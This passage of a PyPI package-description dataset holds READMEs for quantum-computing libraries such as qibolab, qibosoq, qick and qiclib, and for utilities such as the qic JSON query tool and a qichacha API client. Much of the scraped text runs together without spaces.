runcircuit=qibo.models.QFT(5)# authenticate to server through the client instancetoken=\"your-tii-qrc-token\"client=qibo_client.TII(token)# run the circuitresult=client.run_circuit(circuit,nshots=1000,dev=\"sim\")"} +{"package": "qiboconnection", "pacakge-description": "QiboconnectionPython library that allows you to execute quantum programs on Qilimanjaro's QPUs and simulators.ContributionsThank you for your interest in our project. While we appreciate your enthusiasm and interest in contributing, we would like to clarify our policy regarding external contributions.Our Contribution PolicyThis project is primarily intended for reference purposes, and we do not actively accept or manage external contributions, including pull requests and issue reports. Our development team maintains this codebase for internal use and does not have the capacity to review or merge contributions from the community.Why We Have This PolicyOur decision to limit external contributions is based on our specific project goals, resource constraints, and internal policies. While we understand the value of collaboration and open-source contributions, we have chosen to maintain this project as a reference rather than a collaborative, community-driven effort.Seeking Help and SupportIf you have questions about using this project or encounter issues, please feel free to open an issue in the repository for discussion. However, please be aware that our ability to provide support or address issues may be limited.Thank you for your understanding and for considering our project. We hope that you find it useful for your needs, and we wish you the best in your open-source endeavors.Sincerely,Qilimanjaro Quantum Tech"} +{"package": "qibojit", "pacakge-description": "qibojitThis package provides acceleration features forQibosimulations using just-in-time (JIT) custom kernel withnumba,cupyandcuQuantum.DocumentationThe qibojit backend documentation is available atqibo.science.Citation policyIf you use the package please refer tothe documentationfor citation instructions."} +{"package": "qibolab", "pacakge-description": "QibolabQibolab is the dedicatedQibobackend for\nthe automatic deployment of quantum circuits on quantum hardware.Some of the key features of Qibolab are:Deploy Qibo models on quantum hardware easily.Create custom experimental drivers for custom lab setup.Support multiple heterogeneous platforms.Use existing calibration procedures for experimentalists.DocumentationThe qibolab backend documentation is available athttps://qibo.science/qibolab/stable/.Minimum working exampleA simple example on how to connect to a platform and use it execute a pulse sequence:fromqibolabimportcreate_platform,ExecutionParametersfromqibolab.pulsesimportDrivePulse,ReadoutPulse,PulseSequence# Define PulseSequencesequence=PulseSequence()# Add some pulses to the pulse sequencesequence.add(DrivePulse(start=0,amplitude=0.3,duration=4000,frequency=200_000_000,relative_phase=0,shape=\"Gaussian(5)\",# Gaussian shape with std = duration / 5channel=1,))sequence.add(ReadoutPulse(start=4004,amplitude=0.9,duration=2000,frequency=20_000_000,relative_phase=0,shape=\"Rectangular\",channel=2,))# Define platform and load specific runcardplatform=create_platform(\"my_platform\")# Connects to lab instruments using the details specified in the calibration settings.platform.connect()# Execute a pulse sequenceoptions=ExecutionParameters(nshots=1000)results=platform.execute_pulse_sequence(sequence,options)# Print the acquired shotsprint(results.samples)# Disconnect from the instrumentsplatform.disconnect()Here is another example on how to execute circuits:importqibofromqiboimportgates,models# Create circuit and add gatesc=models.Circuit(1)c.add(gates.H(0))c.add(gates.RX(0,theta=0.2))c.add(gates.X(0))c.add(gates.M(0))# Simulate the circuit using numpyqibo.set_backend(\"numpy\")for_inrange(5):result=c(nshots=1024)print(result.probabilities())# Execute the circuit on hardwareqibo.set_backend(\"qibolab\",platform=\"my_platform\")for_inrange(5):result=c(nshots=1024)print(result.probabilities())Citation policyIf you use the package please refer tothe documentationfor citation instructions."} +{"package": "qibosoq", "pacakge-description": "QibosoqRepository for developing server side of RFSoC fpga boards\nQibosoq is a server for integratingQickin theQibolabecosystem\nfor executing arbitrary pulses sequences on QPUs.The complete documentation for can be found at:qibo.science/qibosoq/stableqibo.science/qibosoq/latestInstallationPlease refer to thedocumentationfor installation instructions.Configuration parametersInconfiguration.pysome default qibosoq parameters are hardcoded. They can be changed using environment variables (see documentation).IP of the serverPort of the serverPaths of log filesName of python loggersPath of bitstreamType of readout (multiplexed or not, depending on the loaded bitstream)Run the serverThe simplest way of executing the server is:sudo -E python -m qibosoqand the server can be closed withCtrl-C.Note that with this command the script will close as soon as the terminal where it's running it's closed.\nTo run the server in detached mode you can use:nohup sudo -E python -m qibosoq &And the server can be closed withsudo kill (PID will be saved in log).TII boardsWith TII boards the server can also be executed using the aliasserver-run-bkg.Also, two additional command are added in.bashrc:serverinfoandserverclose.serverinfowill print the PID if the server is running, otherwise will print \"No running server\".serverclosewill close the server, if it is running.All these commands require sudo privileges.ContributingContributions, issues and feature requests are welcome!\nFeel free to check"} +{"package": "qibotf", "pacakge-description": "qibotfThis package provides acceleration features forQibousingTensorFlowcustom operators.DocumentationThe qibotf backend documentation is available atqibo.readthedocs.io.Support and requirementsHere a compatibility matrix for the qibotf versions:qibotfref. qibotensorflowOS HardwareCUDA0.0.6>=0.1.72.8.0 for pip (>=2.2 for source)linux cpu/gpu, mac cpu(pip)/gpu(source)11.20.0.5>=0.1.72.7.1 for pip (>=2.2 for source)linux cpu/gpu, mac cpu(pip)/gpu(source)11.20.0.4>=0.1.72.7.0 for pip (>=2.2 for source)linux cpu/gpu, mac cpu(pip)/gpu(source)11.20.0.30.1.62.6.0 for pip (>=2.2 for source)linux cpu/gpu, mac cpu(pip)/gpu(source)11.20.0.20.1.62.5.0 for pip (>=2.2 for source)linux cpu/gpu, mac cpu(pip)/gpu(source)11.20.0.10.1.62.4.1 for pip (>=2.2 for source)linux cpu/gpu, mac cpu(pip)/gpu(source)11.0Citation policyIf you use the package please cite the following references:https://arxiv.org/abs/2009.01845https://doi.org/10.5281/zenodo.3997194"} +{"package": "qibuild", "pacakge-description": "No description available on PyPI."} +{"package": "qibullet", "pacakge-description": "qiBulletBullet-basedpython simulation forSoftBank Robotics'robots.InstallationThe following modules are required:numpypybulletThe qiBullet module can be installed via pip, for python 2.7 and python 3:pipinstall--userqibulletAdditional resources (robot meshes and URDFs) are required in order to be able to spawn a Pepper, NAO or Romeo robot in the simulation. These extra resources will be installed in your home folder:/home/username/.qibulleton Linux and macOSC:\\Users\\username\\.qibulleton WindowsThe installation of the additional resources will automatically be triggered if you try to spawn a Pepper, NAO or Romeo for the first time. If qiBullet finds the additional resources in your local folder, the installation won't be triggered. The robot meshes are under a specificlicense, you will need to agree to that license in order to install them. More details on the installation process can be found on thewiki.UsageA robot can be spawned via the SimulationManager class:importsysfromqibulletimportSimulationManagerif__name__==\"__main__\":simulation_manager=SimulationManager()# Launch a simulation instances, with using a graphical interface.# Please note that only one graphical interface can be launched at a timeclient_id=simulation_manager.launchSimulation(gui=True)# Selection of the robot type to spawn (True : Pepper, False : NAO)pepper_robot=Trueifpepper_robot:# Spawning a virtual Pepper robot, at the origin of the WORLD frame, and a# ground planepepper=simulation_manager.spawnPepper(client_id,translation=[0,0,0],quaternion=[0,0,0,1],spawn_ground_plane=True)else:# Or a NAO robot, at a default positionnao=simulation_manager.spawnNao(client_id,spawn_ground_plane=True)# This snippet is a blocking call, just to keep the simulation openedifsys.version_info[0]>=3:input(\"Press a key to end the simulation\")else:raw_input(\"Press a key to end the simulation\")# Stop the simulationsimulation_manager.stopSimulation(client_id)Or using loadRobot from the PepperVirtual class if you already have a simulated environment:pepper=PepperVirtual()pepper.loadRobot(translation=[0,0,0],quaternion=[0,0,0,1],physicsClientId=client_id)More snippets can be found in theexamples folder, or on thewiki:warning: The camera subscription system of qiBullet 1.4.0 (and lesser) isdeprecated, use thenew systemDocumentationThe qiBulletAPI documentationcan be foundhere. In order to build the documentation, thedoxygenpackage has to be installed beforehand and the docs folder has to exist. The submodules should also be checked out:gitsubmoduleinit\ngitsubmoduleupdateThe documentation can then be generated via the following command:cddocs\ndoxygenDoxyfileThe repository also contains awiki, providing some tutorials.CitationsPlease cite qiBullet if you use this repository in your publications:@article{busy2019qibullet,\n title={qiBullet, a Bullet-based simulator for the Pepper and NAO robots},\n author={Busy, Maxime and Caniot, Maxime},\n journal={arXiv preprint arXiv:1909.00779},\n year={2019}\n}TroubleshootingOpenGL driverIf you encounter the message:Workaround for some crash in the Intel OpenGL driver on Linux/UbuntuYour computer is using the Intel OpenGL driver. Go toSoftware & Updates,Additional Drivers, and select a driver corresponding to your GPU.LicenseLicensed under theApache-2.0 License"} +{"package": "qic", "pacakge-description": "doc on github.ioqic - Query In ConsoleJSON/YAML/XML comand line query tool with interactive mode.By design, it tries to keep simple. There're a lot compromises. It's not intending to embed a full syntax/sementic engine. For complicated situation, other than introducing very long single line expression, please try code blocks where you can use any python syntax.This document is available with better format on github.ioQiCwhere colorful text can be used for terminal output.InstallationBasicsCheck expanded codeKeys with special charsInteractive modeValidate/Convert JSON/YAML/XMLLimit rowsLoad extra modulesJSON/YAML/XML to HTMLInstallationpython -mpip install qicrun itqicorpython -mqicBasicsby default it will validate, reformat and color the JSON stream.\"_\" means the document root. This is the default value.(py3) [me@mtp qic]$ cat test/s1.json | qic # _\n[\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000001\"\n },\"product_name\": \"sildenafil citrate\",\"supplier\": \"Wisozk Inc\",\"quantity\": 261,\"unit_cost\": \"$10.47\"\n },\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000002\"\n },\"product_name\": \"Mountain Juniperus ashei\",\"supplier\": \"Keebler-Hilpert\",\"quantity\": 292,\"unit_cost\": \"$8.74\"\n },\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000003\"\n },\"product_name\": \"Dextromathorphan HBr\",\"supplier\": \"Schmitt-Weissnat\",\"quantity\": 211,\"unit_cost\": \"$20.53\"\n }\n]query its conent,(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[0]\"\n{\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000001\"\n },\"product_name\": \"sildenafil citrate\",\"supplier\": \"Wisozk Inc\",\"quantity\": 261,\"unit_cost\": \"$10.47\"\n}\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[0]._id\"\n{\"$oid\": \"5968dd23fc13ae04d9000001\"\n}\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[0].product_name\"\nsildenafil citrate\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[0].{product_name, quantity, unit_cost}\"\n{\"product_name\": \"sildenafil citrate\",\"quantity\": 261,\"unit_cost\": \"$10.47\"\n}\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[]._id\"\n[\n {\"$oid\": \"5968dd23fc13ae04d9000001\"\n },\n {\"$oid\": \"5968dd23fc13ae04d9000002\"\n },\n {\"$oid\": \"5968dd23fc13ae04d9000003\"\n }\n]\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[].{_id,quantity}\"\n[\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000001\"\n },\"quantity\": 261\n },\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000002\"\n },\"quantity\": 292\n },\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000003\"\n },\"quantity\": 211\n }\n]Check expanded code(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[]._id\" -X\n# run : \n[ _umy['_id'] for _umy in _ ]\n[\n {\"$oid\": \"5968dd23fc13ae04d9000001\"\n },\n {\"$oid\": \"5968dd23fc13ae04d9000002\"\n },\n {\"$oid\": \"5968dd23fc13ae04d9000003\"\n }\n]\n\n(py3) [me@mtp qic]$ cat test/s1.json | qic \"[ _[0].product_name ]\" -X\n# run : \n[ _[0]['product_name'] ]\n[\n \"sildenafil citrate\"\n]\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[].{_id,quantity}\" -X\n# run : \n[ {'_id':_emt['_id'],'quantity':_emt['quantity']} for _emt in _ ]\n[\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000001\"\n },\"quantity\": 261\n },\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000002\"\n },\"quantity\": 292\n },\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000003\"\n },\"quantity\": 211\n }\n]\n\n\n(py3) [me@mtp qic]$ cat test/s1.json | qic \"_[0].{_id,quantity}\" -X\n# run : \n{'_id':_[0]['_id'],'quantity':_[0]['quantity']}\n{\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000001\"\n },\"quantity\": 261\n}Keys with special charslook at below changed JSON,product_nameis renamed toproduct.name. This will break the dot expansion QiC is using. In this situation, use<>to mark content within is a single unit.(py3) [me@mtp qic]$ qic -f test/s1x.json \n[\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000001\"\n },\"product.name\": \"sildenafil citrate\",\"supplier\": \"Wisozk Inc\",\"quantity\": 261,\"unit_cost\": \"$10.47\"\n },\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000002\"\n },\"product.name\": \"Mountain Juniperus ashei\",\"supplier\": \"Keebler-Hilpert\",\"quantity\": 292,\"unit_cost\": \"$8.74\"\n },\n {\"_id\": {\"$oid\": \"5968dd23fc13ae04d9000003\"\n },\"product.name\": \"Dextromathorphan HBr\",\"supplier\": \"Schmitt-Weissnat\",\"quantity\": 211,\"unit_cost\": \"$20.53\"\n }\n]\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ qic -f test/s1x.json \"_[].product.name\"\n# expanded code :\n[ _kom['product']['name'] for _kom in _ ]\n# KeyError: 'product'\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ qic -f test/s1x.json \"_[].\"\n[\n \"sildenafil citrate\",\n \"Mountain Juniperus ashei\",\n \"Dextromathorphan HBr\"\n]Interactive Mode-Ienable interactive mode.Qic will read user input from sys.stdin. so, for input stream, it could not be from unix pipe, instead use-fopiton.when type_, a small menu is promptec all internal functions started with_.Before prompted for user input, all keys in the JSON are stored for word completion prompt -- as you may have noticed, they're case insenstive.(py3) [me@mtp qic]$ qic -f test/s6.json -I\n[qic] $ ___fl_flatlist_j_l_l2pt_l2t[qic] $ _.users[0].ffirstname[qic] $ _.users[0].firstname\nKrish_l2t is an internal function which print \"standard\" table. \\[qic] $ _l2t(_.users)userId firstName lastName phoneNumber emailAddress------------------------------------------------------------------------\n1 Krish Lee 123456 krish.lee@learningcontainer.com\n2 racks jacson 123456 racks.jacson@learningcontainer.com\n3 denial roast 33333333 denial.roast@learningcontainer.com\n4 devid neo 222222222 devid.neo@learningcontainer.com\n5 jone mac 111111111 jone.mac@learningcontainer.comuse'''to mark code block start and end.[qic] $\n[qic] $ '''\n[qic] $ guys = \"\"\n[qic] $foriin_.users :\n[qic] $ guys += i.firstname + i.lastname + \", \"\n[qic] $ print(\"List :\", guys.rstrip())\n[qic] $\n[qic] $ '''\nList : KrishLee, racksjacson, denialroast, devidneo, jonemac,\n[qic] $\n[qic] $use\\qorquit()to leave Qic.(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ qic -f test/s6.json -I\n[qic] $\n[qic] $ \\q\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ qic -f test/s6.json -I\n[qic] $ quit()\n(py3) [me@mtp qic]$Validate and Convert JSON/XML/YAMLwithout any parameters, feed input into QiC and it will serve as a format validator ( plus foramatter, etc.).-tspecify source as JSON, YAML or XML. here all examples are from JSON format andJSONis the default type. Choose the right one if you're going to working with YAML or XML.Internal function_jsonor-jwill dump output as well formatted JSON and this is the default behaviour._yamlor_ywill dump well formatted YAML, while_xmlor_xwill dump well formatted XML.specify them in format of_x($expr), if for full doc, say,_x(_), just use_x.(py3) [me@mtp qic]$ qic -f test/s6.json _x\n1KrishLee123456krish.lee@learningcontainer.com2racksjacson123456racks.jacson@learningcontainer.com3denialroast33333333denial.roast@learningcontainer.com4devidneo222222222devid.neo@learningcontainer.com5jonemac111111111jone.mac@learningcontainer.com(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ qic -f test/s6.json _y---users:\n-emailAddress: krish.lee@learningcontainer.comfirstName: KrishlastName: LeephoneNumber: '123456'userId: 1\n-emailAddress: racks.jacson@learningcontainer.comfirstName: rackslastName: jacsonphoneNumber: '123456'userId: 2\n-emailAddress: denial.roast@learningcontainer.comfirstName: deniallastName: roastphoneNumber: '33333333'userId: 3\n-emailAddress: devid.neo@learningcontainer.comfirstName: devidlastName: neophoneNumber: '222222222'userId: 4\n-emailAddress: jone.mac@learningcontainer.comfirstName: jonelastName: macphoneNumber: '111111111'userId: 5\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ qic -f test/s6.json '_y(_)'---users:\n-emailAddress: krish.lee@learningcontainer.comfirstName: KrishlastName: LeephoneNumber: '123456'userId: 1\n-emailAddress: racks.jacson@learningcontainer.comfirstName: rackslastName: jacsonphoneNumber: '123456'userId: 2\n-emailAddress: denial.roast@learningcontainer.comfirstName: deniallastName: roastphoneNumber: '33333333'userId: 3\n-emailAddress: devid.neo@learningcontainer.comfirstName: devidlastName: neophoneNumber: '222222222'userId: 4\n-emailAddress: jone.mac@learningcontainer.comfirstName: jonelastName: macphoneNumber: '111111111'userId: 5\n\n(py3) [me@mtp qic]$ \n(py3) [me@mtp qic]$ qic -f test/s6.json '_y(_.users[:2])'----emailAddress: krish.lee@learningcontainer.comfirstName: KrishlastName: LeephoneNumber: '123456'userId: 1\n-emailAddress: racks.jacson@learningcontainer.comfirstName: rackslastName: jacsonphoneNumber: '123456'userId: 2\n\n(py3) [me@mtp qic]$Limit rowswhen the embeded list is huge, we may only want to see a few of them.slice[:$n]can be used for specified list, but-l $napply to all lists included.(py3) [me@mtp qic]$ qic -f test/s6.json '_.users' | qic _y----emailAddress: krish.lee@learningcontainer.comfirstName: KrishlastName: LeephoneNumber: '123456'userId: 1\n-emailAddress: racks.jacson@learningcontainer.comfirstName: rackslastName: jacsonphoneNumber: '123456'userId: 2\n-emailAddress: denial.roast@learningcontainer.comfirstName: deniallastName: roastphoneNumber: '33333333'userId: 3\n-emailAddress: devid.neo@learningcontainer.comfirstName: devidlastName: neophoneNumber: '222222222'userId: 4\n-emailAddress: jone.mac@learningcontainer.comfirstName: jonelastName: macphoneNumber: '111111111'userId: 5\n\n(py3) [me@mtp qic]$ qic -f test/s6.json -l2 '_.users' | qic _y\n# _[] 5 -> 2----emailAddress: krish.lee@learningcontainer.comfirstName: KrishlastName: LeephoneNumber: '123456'userId: 1\n-emailAddress: racks.jacson@learningcontainer.comfirstName: rackslastName: jacsonphoneNumber: '123456'userId: 2\n\n(py3) [me@mtp qic]$ qic -f test/s6.json -l2 '_.users[:2]' \n[\n {\"userId\": 1,\"firstName\": \"Krish\",\"lastName\": \"Lee\",\"phoneNumber\": \"123456\",\"emailAddress\": \"krish.lee@learningcontainer.com\"\n },\n {\"userId\": 2,\"firstName\": \"racks\",\"lastName\": \"jacson\",\"phoneNumber\": \"123456\",\"emailAddress\": \"racks.jacson@learningcontainer.com\"\n }\n]load extra modulesload module/class/function from python source files.yonghang@mtp~ $ cat ~/tmp/tm.py \n\ndef xxlen(ds) :\n return str(len(ds)) + \" : \" + str(ds)\n\nyonghang@mtp~ $ curl -s walkerever.com/share/test/json/s6.json | qic -m ~/tmp/tm.py \"tm.xxlen(_)\"\n1 : {'users': [{'userId': 1, 'firstName': 'Krish', 'lastName': 'Lee', 'phoneNumber': '123456', 'emailAddress': 'krish.lee@learningcontainer.com'}, {'userId': 2, 'firstName': 'racks', 'lastName': 'jacson', 'phoneNumber': '123456', 'emailAddress': 'racks.jacson@learningcontainer.com'}, {'userId': 3, 'firstName': 'denial', 'lastName': 'roast', 'phoneNumber': '33333333', 'emailAddress': 'denial.roast@learningcontainer.com'}, {'userId': 4, 'firstName': 'devid', 'lastName': 'neo', 'phoneNumber': '222222222', 'emailAddress': 'devid.neo@learningcontainer.com'}, {'userId': 5, 'firstName': 'jone', 'lastName': 'mac', 'phoneNumber': '111111111', 'emailAddress': 'jone.mac@learningcontainer.com'}]}you can load more,yonghang@mtp~ $ curl -s walkerever.com/share/test/json/s6.json | qic -m ~/tmp/tm.py,json,yaml \"tm.xxlen(_)\" \n1 : {'users': [{'userId': 1, 'firstName': 'Krish', 'lastName': 'Lee', 'phoneNumber': '123456', 'emailAddress': 'krish.lee@learningcontainer.com'}, {'userId': 2, 'firstName': 'racks', 'lastName': 'jacson', 'phoneNumber': '123456', 'emailAddress': 'racks.jacson@learningcontainer.com'}, {'userId': 3, 'firstName': 'denial', 'lastName': 'roast', 'phoneNumber': '33333333', 'emailAddress': 'denial.roast@learningcontainer.com'}, {'userId': 4, 'firstName': 'devid', 'lastName': 'neo', 'phoneNumber': '222222222', 'emailAddress': 'devid.neo@learningcontainer.com'}, {'userId': 5, 'firstName': 'jone', 'lastName': 'mac', 'phoneNumber': '111111111', 'emailAddress': 'jone.mac@learningcontainer.com'}]}JSON to HTML_h and _zh are two functions for the convertion. _h is to create plain HTML table while _zh makes collapse/expand possible.yonghang@mtp~ $ curl -s walkerever.com/share/test/json/s6.json | qic \"_h\"\n\n\n\nusers\n \n \n \n userId\n 1\n \n \n firstName\n Krish\n \n \n lastName\n Lee\n \n \n phoneNumber\n 123456\n \n \n emailAddress\n krish.lee@learningcontainer.com\n \n \n userId\n 2\n \n \n firstName\n racks\n \n \n lastName\n jacson\n \n \n phoneNumber\n 123456\n \n \n emailAddress\n racks.jacson@learningcontainer.com\n \n \n userId\n 3\n \n \n firstName\n denial\n \n \n lastName\n roast\n \n \n phoneNumber\n 33333333\n \n \n emailAddress\n denial.roast@learningcontainer.com\n \n \n userId\n 4\n \n \n firstName\n devid\n \n \n lastName\n neo\n \n \n phoneNumber\n 222222222\n \n \n emailAddress\n devid.neo@learningcontainer.com\n \n \n userId\n 5\n \n \n firstName\n jone\n \n \n lastName\n mac\n \n \n phoneNumber\n 111111111\n \n \n emailAddress\n jone.mac@learningcontainer.com\n \n \n\n \n\n_h in HTML,usersuserId1firstNameKrishlastNameLeephoneNumber123456emailAddresskrish.lee@learningcontainer.comuserId2firstNamerackslastNamejacsonphoneNumber123456emailAddressracks.jacson@learningcontainer.comuserId3firstNamedeniallastNameroastphoneNumber33333333emailAddressdenial.roast@learningcontainer.comuserId4firstNamedevidlastNameneophoneNumber222222222emailAddressdevid.neo@learningcontainer.comuserId5firstNamejonelastNamemacphoneNumber111111111emailAddressjone.mac@learningcontainer.com_zh table, \nD(1)usersL(5)userId1firstNameKrishlastNameLeephoneNumber123456emailAddresskrish.lee@learningcontainer.comuserId2firstNamerackslastNamejacsonphoneNumber123456emailAddressracks.jacson@learningcontainer.comuserId3firstNamedeniallastNameroastphoneNumber33333333emailAddressdenial.roast@learningcontainer.comuserId4firstNamedevidlastNameneophoneNumber222222222emailAddressdevid.neo@learningcontainer.comuserId5firstNamejonelastNamemacphoneNumber111111111emailAddressjone.mac@learningcontainer.com... to be continued."} +{"package": "qichacha", "pacakge-description": "Xiang Wang @ 2019-02-18 15:41:48\u4f01\u67e5\u67e5api\u6587\u6863\u5b89\u88c5\u6b65\u9aa4\u7533\u8bf7\u81ea\u5df1\u7684\u6570\u636e\u5b89\u88c5pip install qichacha\u521b\u5efaclientfrom qichacha import QichachaClient\nclient = QichachaClient(key=\"\u60a8\u7684key\", secretkey=\"\u60a8\u7684\u5bc6\u94a5\", logger=\"\u60a8\u7684logger\uff0c\u53ef\u4ee5\u4e0d\u586b\")\u8c03\u7528\u63a5\u53e3client.search(name=\"\u5c0f\u6854\u79d1\u6280\")\u63a5\u53e3\u8be6\u7ec6\u6587\u6863\u4f01\u4e1a\u5de5\u5546\u6570\u636e\u67e5\u8be2\u4f01\u4e1a\u5173\u952e\u5b57\u6a21\u7cca\u67e5\u8be2\u63a5\u53e3\u6587\u6863\u5730\u5740>>> result, response = client.search(name=\"\u5c0f\u6854\u79d1\u6280\")\n>>> print(result)\n[\n {\n \"KeyNo\": \"4659626b1e5e43f1bcad8c268753216e\",\n \"Name\": \"\u5317\u4eac\u5c0f\u6854\u79d1\u6280\u6709\u9650\u516c\u53f8\",\n \"OperName\": \"\u7a0b\u7ef4\",\n \"StartDate\": \"2012-07-10T00:00:00\",\n \"Status\": \"\u5b58\u7eed\uff08\u5728\u8425\u3001\u5f00\u4e1a\u3001\u5728\u518c\uff09\",\n \"No\": \"110108015068911\",\n \"CreditCode\": \"9111010859963405XW\"\n },\n {\n \"KeyNo\": \"4178fc374c59a79743c59ecaf098d4dd\",\n \"Name\": \"\u6df1\u5733\u5e02\u5c0f\u6854\u79d1\u6280\u6709\u9650\u516c\u53f8\",\n \"OperName\": \"\u738b\u4e3e\",\n \"StartDate\": \"2015-04-22T00:00:00\",\n \"Status\": \"\u5b58\u7eed\",\n \"No\": \"440301112653267\",\n \"CreditCode\": \"91440300334945450M\"\n },\n ...\n]\u5176\u4ed6\u5982\u6709\u7591\u95ee\u6216\u8005\u9700\u6c42\u63d0\u4f9b\u5176\u4ed6\u63a5\u53e3\uff0c\u6b22\u8fce\u63d0\u4ea4PR\u6216\u8005\u8054\u7cfbramwin@qq.com"} +{"package": "qichang", "pacakge-description": "This is a personal library developed by Qichang Zheng.Installationpipinstallqichang"} +{"package": "qick", "pacakge-description": "QICK: Quantum Instrumentation Control KitThe QICK is a kit of firmware and software to use the Xilinx RFSoC to control quantum systems.It consists of:Firmware for the ZCU111, ZCU216, and RFSoC4x2 evaluation boards. We generally recommend using the newer generation of RFSoCs (ZCU216 and RFSoC4x2) for better overall performance.TheqickPython packageA quick start guidefor setting up your board and running a Jupyter notebook exampleJupyter notebook examplesdemonstrating usageMore examples and tutorialfrom IEEE Quantum Week 2023.Note: The firmware and software here is still very much a work in progress. This is an alpha release. We strive to be consistent with the APIs but cannot guarantee backwards compatibility.Download and InstallationFollow the quick start guide locatedhereto set up your board, installqickon your board, and run a Jupyter notebook example.DocumentationThe API documentation for QICK is available at:https://qick-docs.readthedocs.io/Thedemo notebooksare intended as a tutorial.\nThe first demos explain important features of the QICK system and walk you through how to write working QICK programs.\nThe later demos provide examples of useful measurements you might make with the QICK.\nWe recommend that new users read and understand all of the demos.UpdatesFrequent updates to the QICK firmware and software are made as pull requests.\nEach pull request will be documented with a description of the notable changes, including any changes that will require you to change your code.\nWe hope that this will help you decide whether or not to update your local code to the latest version.\nWe strive for, but cannot guarantee, bug-free and fully functional pull requests.\nWe also do not guarantee that the demo notebooks will keep pace with every pull request, though we make an effort to update the demos after major API changes.Our version numbering follows the format major.minor.PR, where PR is the number of the most recently merged pull request.\nThis will result in the PR number often skipping values, and occasionally decreasing.\nThe tagged release of a new minor version will have the format major.minor.0.Tagged releases can be expected periodically.\nWe recommend that everyone should be using at least the most recent release.\nWe guarantee the following for releases:The demo notebooks will be compatible with the QICK library, and will follow our current best recommendations for writing QICK programs.The firmware images for all supported boards will be fully compatible with the library and the demo notebooks.Release notes will summarize the pull request notes and explain both breaking API changes (what you need to change in your code) and improvements (why you should move to the new release).We recommend that you \"watch\" this repository on GitHub to get automatic notifications of pull requests and releases.ContributeYou are welcome to contribute to QICK development by forking this repository and sending pull requests.All contributions are expected to be consistent withPEP 8 -- Style Guide for Python Code.We welcome comments, bug reports, and feature requests via GitHub Issues.You can chat with us in the #qick channel on theUnitary Fund Discord, where we also haveweekly office hours.LicenseThe QICK source code is licensed under the MIT license, which you can find in the LICENSE file.\nTheQICK logowas designed by Dr. Christie Chiu.You are free to use this software, with or without modification, provided that the conditions listed in the LICENSE file are satisfied."} +{"package": "qiclib", "pacakge-description": "qiclib Python packageqiclib is Quantum Interface's official Python client for the QiController.The QiController is currently developed at theInstitute for Data Processing and ElectronicsfromKarlsruhe Institute of Technology (KIT).InstallingTo install the Python package and make it available globally usingimport qiclib, use:$pipinstallqiclibDevelopingIf you want to be able to make local changes to the source code without the necessity to re-install, please clone the repository locally and install it in editable mode:$pipinstall-e.NOTE: If you add/remove files in this mode, you will still have to re-run this command.In order to be able to commit and push changes, you will have to furthermore install the dev dependencies:$pipinstall-rrequirements-dev.txtand then install thepre-commithook before committing:$pre-commitinstallGetting StartedThe QiController needs to be powered and connected to the same network as the control computer. It can then be accessed via its IP address or host name.Everything is based on the QiController driver class, so simply import qiclib and establish a connection:importqiclibasqlfromqiclib.codeimport*qic=ql.QiController('IP ADDRESS OR HOST NAME')qiclib includes a high-level description language called QiCode (already imported using the second line above). With it, you can conveniently specify your experiments in an easy and intuitive manner.QiCode lets you specify experiments in a generic way, so-called QiJobs, and then execute them on your superconducting qubit chip.\nThe physical properties of your sample are stored inside aQiSampleobject.\nThe sample can consist of one or more cells.\nEach cell corresponds to a qubit and defines all relevant properties for this qubit.\nThis can be pulse lengths, frequencies, but also other experiment-related parameters.For this introduction, we will stick with one qubit and thus one cell:sample=QiSample(1)# 1 cell/qubit onlysample[0][\"rec_pulse\"]=416e-9# s readout pulse lengthsample[0][\"rec_length\"]=400e-9# s recording window sizesample[0][\"rec_frequency\"]=60e6# Hz readout pulse frequencysample[0][\"manip_frequency\"]=80e6# Hz control pulse frequencyOne can define as many properties as one likes.\nThe naming convention of these properties is left completely up to you.\nHowever, if you want to use pre-built experiments from qiclib, you should use the same property names as are used there.\nYou can also store qubit-related characteristics, like decay times and further information which are not needed for the experiments.\nAs the sample can be exported as JSON file and imported again later, this can become quite useful.In the sample, we already provided some information on how our readout pulse should look like and how long our recording window should be.\nAt the beginning, one now typically wants to calibrate the electrical delay of the readout pulse through the experimental setup.\nqiclib offers an automated scheme for this purpose, optimizing for the highest signal amplitude at the IF frequency.\nOf course, manual calibration (see other methods insideql.init) is also possible.ql.init.calibrate_readout(qic,sample,averages=1000)This will perform multiple experiments on the QiController to determine the electrical delay and to record the final readout window.\nIt will also plot you the resulting data using matplotlib.\nThe optimal delay will be stored as\"rec_offset\"inside the sample object so it can be used for the following experiments.Congratulation! You have successfully put the QiController into operation. Now you can continue reading how to use QiCode for your custom experiments.QiCode UsageThe basic commands and classes that are provided for building your experiments with QiCode are:QiPulse(length, shape, amplitude, phase)Creates a pulse object that can be used in other commandsPlay(cell, pulse)Play the givenpulseat the manipulation output for the givencellPlayReadout(cell, pulse)Same asPlaybut for the readout pulse 